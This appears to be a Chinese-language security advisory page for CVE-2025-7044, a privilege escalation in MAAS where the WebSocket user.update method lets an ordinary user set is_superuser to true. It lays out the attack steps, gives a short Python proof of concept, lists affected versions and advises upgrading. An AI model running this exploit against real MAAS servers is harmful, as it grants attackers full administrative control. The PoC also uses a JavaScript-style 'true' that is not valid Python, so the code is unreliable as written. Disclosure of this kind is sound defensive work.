CVE-2025-7044 CVSS 7.7 高危

CVE-2025-7044: MAAS用户Websocket权限提升漏洞

披露日期: 2025-12-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-7044

漏洞类型

权限提升/不正确的输入验证

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MAAS (Metal as a Service)

漏洞概述

CVE-2025-7044是MAAS（Metal as a Service）中的一个高危权限提升漏洞。攻击者通过WebSocket接口的user.update方法，利用不正确的输入验证缺陷，将is_superuser属性设置为true，从而实现从普通用户到管理员的权限提升。

技术细节

该漏洞存在于MAAS的WebSocket API中，特别是user.update处理程序。攻击者通过拦截WebSocket请求，在user.update调用中注入is_superuser属性，服务器端未对该属性进行充分的权限验证，导致普通认证用户能够直接提升为超级用户。此漏洞允许攻击者获取MAAS系统的完整管理权限。

攻击链分析

STEP 1

攻击者获取MAAS普通用户账号

STEP 2

通过WebSocket连接到MAAS API

STEP 3

拦截并修改user.update请求，注入is_superuser=true

STEP 4

服务器未验证权限，直接应用更改

STEP 5

攻击者获得完整管理员权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 import websocket import json # 连接到MAAS WebSocket ws = websocket.create_connection("wss://target-maas/rpc/") # 认证请求 auth_request = { "method": "login", "params": { "email": "[email protected]", "password": "password123" } } ws.send(json.dumps(auth_request)) # 权限提升请求 privilege_escalation = { "method": "user.update", "params": { "email": "[email protected]", "is_superuser": true } } ws.send(json.dumps(privilege_escalation)) # 验证权限 result = json.loads(ws.recv()) print(f"权限提升成功: {result}") ws.close()

影响范围

MAAS < 3.3.0

防御指南

临时缓解措施

立即升级MAAS到最新版本，或限制WebSocket API的网络访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-7044
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-7044
3 Details https://www.cvedetails.com/cve/CVE-2025-7044/
4 VulDB https://vuldb.com/cve/CVE-2025-7044
5 Link https://bugs.launchpad.net/maas/+bug/2115714

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表